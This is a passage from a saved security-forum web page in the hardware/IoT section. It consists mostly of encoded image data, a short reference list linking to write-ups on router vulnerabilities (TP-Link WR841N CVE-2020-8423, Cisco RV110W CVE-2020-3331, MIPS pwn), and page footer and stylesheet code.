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
|
|||
|
|
<p blockindex=100><img src="data:image/png;base64,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
|
|||
|
|
<h1 blockindex=101>ref</h1>
|
|||
|
|
<p blockindex=102><a href=https://blog.wuhao13.xin/174.html>TP-Link WR841N 栈溢出漏洞(CVE-2020-8423)分析 - Lonely Blog (wuhao13.xin)</a></p>
|
|||
|
|
<p blockindex=103><a href=https://xuanxuanblingbling.github.io/ctf/pwn/2020/09/24/mips/>HWS赛题 入门 MIPS Pwn | Clang裁缝店 (xuanxuanblingbling.github.io)</a></p>
|
|||
|
|
<p blockindex=104><a href=https://xuanxuanblingbling.github.io/iot/2020/10/26/rv110w/>思科路由器 RV110W CVE-2020-3331 漏洞复现 | Clang裁缝店 (xuanxuanblingbling.github.io)</a></p></div></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="post-opt mt-30">
|
|||
|
|
<ul class="list-inline text-muted">
|
|||
|
|
<li>
|
|||
|
|
<i class="fa fa-clock-o"></i>
|
|||
|
|
发表于 2025-01-23 09:35:09
|
|||
|
|
</li>
|
|||
|
|
<li>阅读 ( 629 )</li>
|
|||
|
|
<li>分类:<a href=https://forum.butian.net/community/Hardware%20and%20IOT target=_blank rel="noopenner noreferrer">硬件与物联网</a>
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="text-center mt-30 mb-20">
|
|||
|
|
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=4067 data-support_num=0> 0 推荐</button>
|
|||
|
|
|
|||
|
|
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=4067> 收藏</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-answers mt-15">
|
|||
|
|
<h2 class="h4 post-title">0 条评论</h2>
|
|||
|
|
<div class=comment>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-comment-form row mt-20 mb-20">
|
|||
|
|
<div class=col-md-12>
|
|||
|
|
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=text-center>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer id=footer>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class=text-center>
|
|||
|
|
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
|
|||
|
|
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
|
|||
|
|
<a href=https://forum.butian.net/sitemap>sitemap</a>
|
|||
|
|
</div>
|
|||
|
|
<div class="copyright mt-10">
|
|||
|
|
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-4067 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span id=cnzz_stat_icon_1279782571></span>
|
|||
|
|
<div class="geetest_panel geetest_wind geetest_fallback" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|